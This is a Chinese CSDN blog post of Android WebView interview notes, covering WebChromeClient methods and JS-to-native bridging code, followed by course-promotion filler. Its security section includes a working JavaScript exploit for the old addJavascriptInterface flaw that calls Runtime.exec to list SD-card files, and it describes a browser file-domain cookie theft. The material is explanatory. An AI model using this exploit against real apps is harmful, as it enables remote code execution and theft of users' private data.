Webview 面试常见问题,2024年Android高级面试题总结

最新推荐文章于 2024-05-08 10:50:31 发布
最新推荐文章于 2024-05-08 10:50:31 发布
阅读量911 收藏 11
点赞数 16
分类专栏: 程序员 文章标签: 面试 android 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/afagagagaa/article/details/137636888
版权
  • WebChromeClient

Bitmap getDefaultVideoPoster ()

View getVideoLoadingProgressView ()

void getVisitedHistory (ValueCallback<String[]> callback)

void onCloseWindow (WebView window)

boolean onConsoleMessage (ConsoleMessage consoleMessage)

void onConsoleMessage (String message, int lineNumber, String sourceID)

boolean onCreateWindow (WebView view, boolean isDialog, boolean isUserGesture, Message resultMsg)

void onExceededDatabaseQuota (String url, String databaseIdentifier, long quota, long estimatedDatabaseSize, long totalQuota, WebStorage.QuotaUpdater quotaUpdater)

void onGeolocationPermissionsHidePrompt ()

void onGeolocationPermissionsShowPrompt (String origin, GeolocationPermissions.Callback callback)

void onHideCustomView ()

boolean onJsAlert (WebView view, String url, String message, JsResult result)

boolean onJsBeforeUnload (WebView view, String url, String message, JsResult result)

boolean onJsConfirm (WebView view, String url, String message, JsResult result)

boolean onJsPrompt (WebView view, String url, String message, String defaultValue, JsPromptResult result)

boolean onJsTimeout ()

void onPermissionRequest (PermissionRequest request)

void onPermissionRequestCanceled (PermissionRequest request)

void onProgressChanged (WebView view, int newProgress)

void onReachedMaxAppCacheSize (long requiredStorage, long quota, WebStorage.QuotaUpdater quotaUpdater)

void onReceivedIcon (WebView view, Bitmap icon)

void onReceivedTitle (WebView view, String title)

void onReceivedTouchIconUrl (WebView view, String url, boolean precomposed)

void onRequestFocus (WebView view)

void onShowCustomView (View view, int requestedOrientation, WebChromeClient.CustomViewCallback callback)

void onShowCustomView (View view, WebChromeClient.CustomViewCallback callback)

boolean onShowFileChooser (WebView webView, ValueCallback<Uri[]> filePathCallback, WebChromeClient.FileChooserParams fileChooserParams)

JS -> Native 通讯

===============

WebViewClient#shouldOverrideUrlLoading

JS 调用Native

链接方式

webview.setWebViewClient(new WebViewClient(){

@Override

public boolean shouldOverrideUrlLoading(WebView view, String s) {

Uri uri = Uri.parse(s);

Log.d(“test112”, s);

if(uri.getScheme().startsWith(“jsbridge”)) {

String arg1 = uri.getQueryParameter(“arg1”);

String arg2 = uri.getQueryParameter(“arg2”);

String s1 = “JS调用Native,参数1:”+arg1+“参数2:”+arg2;

Toast.makeText(MainActivity.this, s1, Toast.LENGTH_LONG).show();

}

return true;

}

});

@JavascriptInterface

public class AndroidToJS extends Object {

@JavascriptInterface

public void hello(String msg) {

Toast.makeText(MainActivity.this, msg, Toast.LENGTH_LONG).show();

}

}

webView.addJavascriptInterface(new AndroidToJS(), “test”);

  • 提供用于JS调用的方法必须为public类型

  • 在API 17及以上,提供用于JS调用的方法必须要添加注解@JavascriptInterface

  • 这个方法不是在主线程中被调用的

bridge

WebChromeClient#onJsAlert()、onJsConfirm()、onJsPrompt()


webview.setWebChromeClient(new WebChromeClient() {

@Override

public boolean onJsPrompt(WebView view, String url, String message, String defaultValue, JsPromptResult result) {

result.cancle();

return true;

}

});

如果不调用result.cancle(),并且返回false,会展示一个dialog

Native -> JS 通讯

===============

webView.loadUrl("javascript:xxx)

webView.loadUrl(“javascript: alert(‘Native注入的JS’)”);

或者内置js代码

InputStreamReader isr = null;

try {

isr = new InputStreamReader(this.getAssets().open(“test.js”), “UTF-8”);

BufferedReader bf = new BufferedReader(isr);

String content = “”;

StringBuilder sb = new StringBuilder();

while (content != null) {

content = bf.readLine();

if (content == null) {

break;

}

sb.append(content.trim());

}

bf.close();

wholeJS = sb.toString();

} catch (IOException e) {

e.printStackTrace();

}

webView.loadUrl("javascript: " + wholeJS);

evaluateJavascript

webView.evaluateJavascript(“getUID()”, new ValueCallback() {

@Override

public void onReceiveValue(String value) {

Log.d(“CALLBACK”, value);

}

});

比较

==

安全问题

====

远程代码执行漏洞

Android API level 17以及之前的系统版本,由于程序没有正确限制使用addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法。 通过addJavascriptInterface给WebView加入一个JavaScript桥接接口,JavaScript通过调用这个接口可以直接与本地的Java接口进行交互。就有可能出现手机被安装木马程序、发送扣费短信、通信录和短信被窃取、获取本地设备的SD卡中的文件等信息,从而造成信息泄露,甚至手机被远程控制等安全问题。

function execute(cmdArgs)

{

for (var obj in window) {

console.log(obj);

if (“getClass” in window[obj]) {

alert(obj);

return window[obj].getClass().forName(“java.lang.Runtime”).

getMethod(“getRuntime”,null).invoke(null,null).exec(cmdArgs);

}

}

}

//从执行命令后返回的输入流中得到字符串,

从而得到文件名的信息,有很严重暴露隐私的危险。

var p = execute([“ls”,“/mnt/sdcard/”]);

document.write(getInputStream2String(p.getInputStream()));

addJavascriptInterface接口,需使用以下方法:Android4.2以上,允许被JavaScript调用的方法必须以@JavascriptInterface进行注解声明,

密码明文存储漏洞

WebView默认开启密码保存功能mWebView.setSavePassword(true),如果该功能未关闭,在用户输入密码时,会弹出提示框,询问用户是否保存密码,如果选择"是",密码会被明文保到/data/data/com.package.name/databases/webview.db

域控制不严格漏洞

Android中默认mWebView.setAllowFileAccess(true),在File域下,能够执行任意的JavaScript代码,同源策略跨域访问能够对私有目录文件进行访问等。APP对嵌入的WebView未对file:/// 形式的URL做限制,会导致隐私信息泄露,针对IM类软件会导致聊天信息、联系人等等重要信息泄露,针对浏览器类软件,则更多的是cookie信息泄露。

360手机浏览器缺陷可导致用户敏感数据泄漏

以360手机浏览器4.8版本为例,由于未对file域做安全限制,恶意APP调用360浏览器加载本地的攻击页面(比如恶意APP释放到SDCARD上的一个HTML)后,就可以获取360手机浏览器下的所有私有数据,包括webviewCookiesChromium.db下的cookie内容,攻击页面关键代码:

function getDatabase() {

var request = false;

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Android工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Android移动开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
img
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Android开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加V获取:vip204888 (备注Android)
img

最后

这里附上上述的技术体系图相关的几十套腾讯、头条、阿里、美团等公司2021年的面试题,把技术点整理成了视频和PDF(实际上比预期多花了不少精力),包含知识脉络 + 诸多细节,由于篇幅有限,这里以图片的形式给大家展示一部分。

相信它会给大家带来很多收获:

img

当程序员容易,当一个优秀的程序员是需要不断学习的,从初级程序员到高级程序员,从初级架构师到资深架构师,或者走向管理,从技术经理到技术总监,每个阶段都需要掌握不同的能力。早早确定自己的职业方向,才能在工作和能力提升中甩开同龄人。

  • 无论你现在水平怎么样一定要 持续学习 没有鸡汤,别人看起来的毫不费力,其实费了很大力,这四个字就是我的建议!!!
  • 我希望每一个努力生活的IT工程师,都会得到自己想要的,因为我们很辛苦,我们应得的。

当我们在抱怨环境,抱怨怀才不遇的时候,没有别的原因,一定是你做的还不够好!

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img
诸多细节**,由于篇幅有限,这里以图片的形式给大家展示一部分。

相信它会给大家带来很多收获:

[外链图片转存中…(img-REHiLbVk-1712814933667)]

当程序员容易,当一个优秀的程序员是需要不断学习的,从初级程序员到高级程序员,从初级架构师到资深架构师,或者走向管理,从技术经理到技术总监,每个阶段都需要掌握不同的能力。早早确定自己的职业方向,才能在工作和能力提升中甩开同龄人。

  • 无论你现在水平怎么样一定要 持续学习 没有鸡汤,别人看起来的毫不费力,其实费了很大力,这四个字就是我的建议!!!
  • 我希望每一个努力生活的IT工程师,都会得到自己想要的,因为我们很辛苦,我们应得的。

当我们在抱怨环境,抱怨怀才不遇的时候,没有别的原因,一定是你做的还不够好!

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-XiAPqooq-1712814933667)]

afagagagaa
关注
  • 16
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webview最全面详解(一)了解官方文档,Android攒了一个月的面试题及解答
m0_64383736的博客
12-09 424
Uri uri = Uri.parse(“https://www.example.com”); Intent intent = new Intent(Intent.ACTION_VIEW, uri); startActivity(intent); See Intent for more information. To provide a WebView in your own Activity, include a in your layout, or set the entire Activity win
Android-WebView4,android中常见的面试题
sa3221sa的博客
02-03 809
compile ‘com.hjhrq1991.library.tbs:tbsjsbridge:1.0.0’ 添加权限 在你的布局上添加TbsBridgeWebView <com.hjhrq1991.library.tbs.TbsBridgeWebView android:id="@+id/webView" android:layout_width=“match_parent” android:layout_height=“match_parent” /> JsBridge的使用
android webview 面试
风的方向
03-04 1886
总结 参考:https://www.jianshu.com/p/fd61e8f4049e 内核版本比较:https://www.cnblogs.com/gcczhongduan/p/4237959.html x5 和 原生 比较:https://www.jianshu.com/p/d27f3379a4b7 使用心得 https://www.jianshu.com/p/3c94ae673e2a ht...
2024最新Android-WebView的使用,安卓开发面试题8消息机制全解析全解析
2401_84538544的博客
05-08 848
各行各样都会淘汰一些能力差的,不仅仅是IT这个行业,所以,不要被程序猿是吃青春饭等等这类话题所吓倒,也不要觉得,找到一份工作,就享受安逸的生活,你在安逸的同时,别人正在奋力的向前跑,这样与别人的差距也就会越来越遥远,加油,希望,我们每一个人,成为更好的自己。BAT大厂面试题、独家面试工具包,资料包括 数据结构、Kotlin、计算机网络、Framework源码、数据结构与算法、小程序、NDK、Flutter。
androidwebview白色,面试要掌握这几个关键点!内容太过真实
m0_52308677的博客
05-18 340
现状 后端转 Android 我该从何处下手,现在学习 android 晚吗? 我的回答是晚还不至于,因为目前是市场趋于稳定正常,这个是市场发展的比如趋势,现在火爆大家都看好的人工智能,大数据,犹如2010刚开始的移动开发。目前现在是需求量趋于平衡,对初中级水平的开发人员需求量变少,但是对高级以上的需求市场还是很匮乏,特别是对于特定细分领域的Android开发人员也是很匮乏,对Android开发的综合能力,特别是基础原理性要求也越来越高,比如很多公司要求会对对某项要求会优先考虑,比如现在流行的Kotlin
Android面试笔记之WebView详解
qq_35857451的博客
06-27 167
WebView面试详解前言一、WebView常见的一些坑二、WebVIew内存泄漏问题总结 前言 Android面试基本知识点->WebView面试详解问题记录,后续会完善。 提示:以下是本篇文章正文内容,下面案例可供参考 一、WebView常见的一些坑 webviewandroid api16以及之前版本的安全漏洞,该漏洞是因为程序没有正确的限制webview.addjavascriptinterface方法,让远程攻击者可以使用java的反射机制利用该漏洞执行任意的java对象方法。
2024-Android高级面试题
最新发布
06-08
### 2024-Android高级面试题:性能优化与框架使用 #### 一、性能优化 ##### 1. App启动速度优化 - **优化策略**:为了提高App的启动速度,可以采取以下几种策略: - **延迟加载**:在启动过程中延迟非必要的资源...
Android高级面试题.pdf
07-08
### Android高级面试题知识点详解 #### 一、性能优化 **1. App启动速度优化** - **优化目标**: 提升用户初次打开应用时的体验,减少启动时间。 - **优化策略**: - **延迟加载**: 实现一个延迟加载框架或SDK,...
2022最新Android高级技术笔试面试试题及答案.docx
11-04
本文档总结Android高级技术笔试面试试题及答案,涵盖了Android开发中各种重要知识点,包括WebView、XML解析、权限管理、Camera拍照、LocationManager定位、AppWidget小部件、AsyncTask异步任务、HttpUrlConnection...
Android WebView 常见问题及处理方案
01-05
但是androidwebview默认支持的功能非常弱,很多地方都是需要自定义的,才能达到我们想要的效果。并且webview在不同的版本会有不同程度的bug。下面小编把webview经常出现的问题给大家整理如下: 1.为WebView自定义...
AndroidWebView常见问题及解决方案汇总
09-01
Android开发中,WebView是一个非常重要的组件,它允许开发者在应用...以上就是AndroidWebView常见的一些问题及其解决方案。理解并掌握这些技巧,将有助于你在开发过程中更好地利用WebView,提升应用的用户体验。
BAT大咖助力Android面试5-WebView面试详解
superjunjin的专栏
05-03 610
五,WebView面试详解 1,简介 2,作用 3,方法 (1),常用方法 (2),WebSettings类方法 (3),WebViewClient类方法 (4),WebChromeClient类 4,WebView与JS的交互 5,如何避免WebView内存泄露? 6,注意 五,WebView面试详解 1,简介 WebView是一个基于webkit引擎...
Webview 面试常见问题,安卓面试题生命周期
m0_66264881的博客
02-02 1480
String s1 = “JS调用Native,参数1:”+arg1+“参数2:”+arg2; Toast.makeText(MainActivity.this, s1, Toast.LENGTH_LONG).show(); } return true; } }); @JavascriptInterface public class AndroidToJS extends Object { @JavascriptInterface public void hello(String msg) { Toast
Android面试题
u010926168的博客
10-21 1405
Android四大组件及使用。 Activity :应用程序中,一个Activity通常就是一个单独的屏幕,它上面可以显示一些控件也可以监听并处理用户的事件做出响应。 BroadcastReceive广播接收器:应用可以使用它对外部事件进行过滤只对感兴趣的外部事件(如当电话呼入时,或者数据网络可用时)进行接收并做出响应。广播接收器没有用户界面。然而,它们可以启动一个activity或serice 来响应它们收到的信息,或者用NotificationManager 来通知用户。通知可以用很多种方式来吸引用户
WebView面试知识小结
lingguiqin的博客
01-04 584
本博客是对WebView基本面试知识的一个小结。
Android WebView 精简Demo
Beluga_白鲸
03-19 1685
需求 这里放一个Android WebView的简单Demo,不过这个Demo是我这边特别精简的,能基本上适用于我这边大部分的页面显示和功能问题,多余的代码和配置都被我删掉了; 注释掉的代码是不同的情景模式,不做注释了。 代码 package zql.h5; import android.content.Context; import android.content.Intent; i...
如何设计一个优雅健壮的Android WebView?(下)
weixin_34217711的博客
02-27 650
(这篇文章写得有点晚,请谅解~) 前言 在上文《如何设计一个优雅健壮的Android WebView?(上)》中,笔者分析了国内WebView的现状,以及在WebView开发过程中所遇到的一些坑。在踩坑的基础上,本文着重介绍WebView在开发过程中所需要注意的问题,这些问题大部分在网上找不到标准答案,但却是WebView开发过程中几乎都会遇到的。此外还会浅谈WebView优化,旨在给用户带来更好...
WebView相关面试题
qq_40959750的博客
11-09 2778
1、如何提高WebView加载速度 美团技术分享 WebView启动过程大概分为以下几个阶段: App中打开WebView的第一步并不是建立连接,而是启动浏览器内核。 优化手段围绕着以下两个点进行: 预加载WebView。 加载WebView的同时,请求H5页面数据。 常见的方法是全局WebView,在客户端刚启动时,就初始化一个全局的WebView待用,并隐藏;这种方法可以比较有效的减少WebView在App中的首次打开时间。当用户访问页面时,不需要初始化WebView的时间。 当然这也带来
2023Android面试题及答案1w字的总结
m0_64365896的博客
05-29 1182
创建自定义 View 的类:可以通过继承 View 或者 ViewGroup 类来创建自定义 View 的类,并实现相应的方法来实现自定义 View 的功能。提供自定义 View 的属性:在自定义 View 的类中,通过使用 @Attr、@Styleable 注解来定义自定义 View 的属性,并在 attrs.xml 文件中声明对应的属性。
android面试题2022中高级
06-03
好的,以下是一些 Android高级面试题: 1. 什么是 Android 中的 ContentProvider,它的作用是什么? 2. 请解释一下Android中的Binder机制? 3. 什么是 Android 中的 AIDL,其作用是什么?请给出一个示例。 4. 介绍一下 Android 中的事件分发机制? 5. Android 中的线程池有哪些?请分别介绍它们的特点和使用场景。 6. 什么是 Handler 和 Looper?它们有什么作用? 7. Android 中的动画有哪些类型?请简要介绍一下它们。 8. 介绍一下 Android 中的 WebView,如何优化 WebView 的性能? 9. 请简要介绍一下 Android 中的 RecyclerView,以及它的优势和使用场景。 10. 什么是 Android 中的依赖注入?请简要介绍一下依赖注入的原理和使用场景。 希望这些问题能帮助你准备好面试。祝你好运!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值